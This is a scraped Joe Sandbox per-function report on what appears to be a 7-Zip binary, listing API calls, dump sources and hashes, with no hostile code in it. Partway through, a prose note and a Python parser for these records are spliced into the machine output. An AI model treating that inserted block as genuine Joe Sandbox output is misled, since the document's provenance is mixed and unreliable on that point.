                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                • Instruction ID: 7ecb91508108ec1b0b411114e5ad5013e617358fed525c7732b9adb22270f9ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE04676224680CBE744CF60E404B4AB3A0F398B24F000124DE8E83B54CBBCC144CF40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                • Instruction ID: 131fcfd8c411d2b98100dbef955227562d4f376632f16a06b1f13cf2102fefb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5D012B2702504C5FF654FA2E85437523646B68F54F5C5011CE194A340EB2D8895C760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                • Instruction ID: 97c64856a141aef88b86bf1721a72ee1a2d91246f5f2f8ff11606af8a831a06d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D0177A614684C6E7008F60E04979AF764F398B64F480104EA8806764CBBCC199CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1795875747-0
                                                                                                                                                                                                                                • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                • Instruction ID: 8b5e5d1cb6e59a5a3061157ba72fc0f89ad10846518829bbdf4ade6afb75bd95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
• Instruction Fuzzy Hash: 0FD0A7D170074991CE109B26E4142696321B758BC8F045021DDAD07314DA2CC1058B00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
• Instruction ID: 3df933fcd4c4282e7f37f8e3fdba63648daef3fff470c0ee3e6d02d29885747a
• Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
• Instruction Fuzzy Hash: 24D0137770994581DF355F79D45436413519B54F74F184311CDB4493E4EF3584D6C711
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: FileTime
• String ID:
• API String ID: 1425588814-0
• Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
• Instruction ID: aaa5e600ae99bd80d4ada1a7b1da965d10761a623eafe3683a2cbcedd9f51ccf
• Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
• Instruction Fuzzy Hash: 08B09230B12400C2CB0CA722D89631C13606798B21FE14429C90FD5650DD1C85E94700
APIs
• GetLastError.KERNEL32 ref: 00203E2A
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ErrorExceptionLastThrowmalloc
• String ID:
• API String ID: 2114622545-0
• Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
• Instruction ID: 3f338523c8163d54d3f2cab50e84c3b76f8514db6d05c45abe6558897d01546f
• Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
• Instruction Fuzzy Hash: A831CE32221B4286DB15DF29E584369B3A9FB88FE0F184235DF6A07796DF38C965C300
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
• Instruction ID: 146137a56e5121188c7c8143b2387b63c9be6cd68f7161f6b99cd828dddbe5f0
• Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
• Instruction Fuzzy Hash: FD21287370424896C728EA1AB80057A7794F799BF4F245325FF7A87794EB78C942C740
APIs
• memmove.MSVCRT(?,?,?,?,?,001F9B61), ref: 001F911C
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ExceptionThrowmallocmemmove
• String ID:
• API String ID: 2847158419-0
• Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
• Instruction ID: 03764c7c59d393d2842b0b7a586983498c816e92a9870649e70f0aa393f69bd8
• Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
• Instruction Fuzzy Hash: 4F217F77201B8585DB11EF1AE81472AB3A4F784FA8F19C225DF6807394DF39C496C740
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
• Instruction ID: a726a89aaefcf5b7fd652c2b38ae6938ebe0f629c958fa96485965898829500d
• Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
• Instruction Fuzzy Hash: 43113A6276565397CB3C8B6CE4B0228A251F75478CBA45C37DACA87B10DB6ACC82D2C1
APIs
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41B9
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41C5
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41D1
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41DD
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41E6
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41EF
  • Part of subcall function 001F419C: free.MSVCRT ref: 001F41F8
• free.MSVCRT ref: 00203F45
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                • Instruction ID: 8dc80688ad54c7dfe3732482d1a2c3c430b3b91863d08242df2e005be6aff52a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21012973A24394CAC7219F1DC18116DBB34F759FE83289116EB4A07761E732C883C7A1
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
• Instruction ID: f4e625e4c61fb7829d8c879026c9bab7c64a29e8b54f6335c49b6038cbfa9de1
• Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
• Instruction Fuzzy Hash: 42011D7635624086E710CF15D56C36E7BB0B7E5B68F180209DBA44B3D1C77AC54ACBA4
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
• Instruction ID: 0ecc1c989ae1600eb9ae2d6795b01362685004a3509f675f56585a8f4f23e7d5
• Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
• Instruction Fuzzy Hash: B5F0E56231014987CB10DFBA9A8126821A1FB587D5F90183BEF8687701EB38CC99C764
APIs
  • Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
• GetLastError.KERNEL32 ref: 001DCB49
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
• Instruction ID: 1a98cb0f0ec80085cfe5ad4f58077641573638bf70a39aa50230840d78378893
• Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
• Instruction Fuzzy Hash: A2D05B417A009596DB545EBD58D13740081B728795F901837DD9BCA352E618CDC9E269
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memmove
• String ID:
• API String ID: 2162964266-0
• Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
• Instruction ID: 92b9b6d9eb7a2fc0db7991f57414183d45790bbc115db54d3ea8a1f82fde8852
• Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
• Instruction Fuzzy Hash: 1BD05EA67506D886CA049B27D68151DA3229B98FD4708D4249F080B70ACE30CCE6CB50
APIs
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
• Instruction ID: d2e7d8c4ee181793306d1208a89db2ad04dd859d3e140538c313b43044ffec6b
• Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
• Instruction Fuzzy Hash: 0DD0A7B360194480DB291F7EC8403341350A754B78F284311CAF44A3D0EF2489C68301
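The per-function records above follow one fixed text layout: an "APIs" list of call sites (with callee references marked "Part of subcall function"), then "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" bullets. The Python below is an added example, not Joe Sandbox's own code or tooling: it parses blocks of that layout into structured records, strips the "Download File" link text that the HTML export glues onto dump names, and answers the question a reviewer actually asks of this data, namely which functions call a given API themselves rather than through a subcall. The layout is inferred from the report text; SAMPLE is a constructed excerpt of the raw export built from records on this page.

```python
"""Parse Joe Sandbox per-function records (the 'APIs' / 'Memory Dump Source' /
'Joe Sandbox IDA Plugin' / 'Similarity' blocks) into structured data that can
be queried across a report. Added example, not Joe Sandbox's own code; the
layout is inferred from the report text, SAMPLE is a constructed excerpt."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SECTIONS = ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# '• [Part of subcall function <caller>: ]<api>.<module>[(<args>)][,] ref: <addr>'
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")  # '• key: value'
LINK_RESIDUE = "Download File"  # link text the HTML export glues onto dump names


@dataclass
class ApiRef:
    api: str
    module: str
    ref: str                   # call-site address
    caller: str | None = None  # set when listed as 'Part of subcall function'
    args: str | None = None


@dataclass
class FunctionRecord:
    apis: list[ApiRef] = field(default_factory=list)
    # metadata from the three non-API sections; keys repeat ('Associated'
    # appears once per dump), so every value is kept as an ordered list
    meta: dict[str, list[str]] = field(default_factory=dict)

    def get(self, key: str) -> str:
        return self.meta.get(key, [""])[0]


def parse_records(text: str) -> list[FunctionRecord]:
    """One record per 'APIs' heading; text before the first heading is skipped."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif not line or current is None:
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiRef(m["api"], m["module"], m["ref"], m["caller"], m["args"]))
        elif m := KV_RE.match(line):
            value = m["value"]
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)].strip()
            current.meta.setdefault(m["key"].strip(), []).append(value)
    return records


def direct_calls(record: FunctionRecord) -> list[str]:
    """APIs the function calls itself, in report order; subcall entries excluded."""
    return [a.api for a in record.apis if a.caller is None]


def find_by_api(records: list[FunctionRecord], api: str) -> list[FunctionRecord]:
    """Records whose own code (not a callee) references the given API."""
    return [r for r in records if api in direct_calls(r)]


# Constructed excerpt of the raw export (two 'Associated' lines kept, link residue intact).
SAMPLE = """\
APIs
  • Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
• GetLastError.KERNEL32 ref: 001DCB49
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• Instruction Fuzzy Hash: A2D05B417A009596DB545EBD58D13740081B728795F901837DD9BCA352E618CDC9E269
APIs
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
Similarity
• API ID: CloseHandle
• Instruction Fuzzy Hash: 0DD0A7B360194480DB291F7EC8403341350A754B78F284311CAF44A3D0EF2489C68301
APIs
Similarity
• API ID: memmove
"""
```

The subcall distinction matters when reading these records: the "CloseErrorHandleLast" function never calls CloseHandle itself, it only reaches it through the callee at 001D89D8, so `find_by_api(records, "CloseHandle")` returns only the record whose own code carries the call site.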
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
• Instruction ID: c81a82cc72e7bd60ad44bc3963268a212598454e74cb7f6620f3509d6669814a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC08C4178224902C90A222BAF8636C12220FEABD1E4C88219E480BB52DB6488E2C750
APIs
Strings
Similarity
• API ID: free$memmove
• String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
• API String ID: 1534225298-798110030
• Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
• Instruction ID: b2032fe5e3d89127c3b67b4aead3cc25953467bb49af5bbd166d6e31a483a14c
• Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
• Instruction Fuzzy Hash: E8C15D72224A4096CA10EF11F88479EB370F7E5B90F945136EA9F43B29DF38D586CB40
APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
• Instruction ID: b2677f498a2f327cb63c95fe6469549b044cc6a9643992929c18c64a1c168a08
• Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
• Instruction Fuzzy Hash: 43D14936218AC481CB24DF22E4646AEB774F7DAB84F459043DB9E43B66CF38C859CB14
APIs
Strings
Similarity
• API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
• String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
• API String ID: 600854398-319139910
• Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
• Instruction ID: 7b21c826dc1ca4a216580b49b56c4c9a570d82e3e4911b3e3a462dd41a272cfe
• Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
• Instruction Fuzzy Hash: AF518C76315A8691EE60EF95F84C7E96361F7A8B80F444026DE5E43759EF3CC549C700
APIs
Strings
Similarity
• API ID: fputs$free$memset$strlen$memmove
• String ID: data:
• API String ID: 527563900-3222861102
• Opcode ID: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
• Instruction ID: 85c5d9ca17ce7696baeaa77ea865c79ee6070c1c29b2714bb988e1146207aec9
• Opcode Fuzzy Hash: 7f35ab0e6331bc4047d8b77d44634953cdcad3e9273a8884933ef37d4d4427da
• Instruction Fuzzy Hash: 14023A3322868297DB10DF35E4943EE77A2F7B4788F445012EE4947769EB78CA99CB40
APIs
• memset.MSVCRT ref: 0020FAAC
• free.MSVCRT ref: 0020FAC0
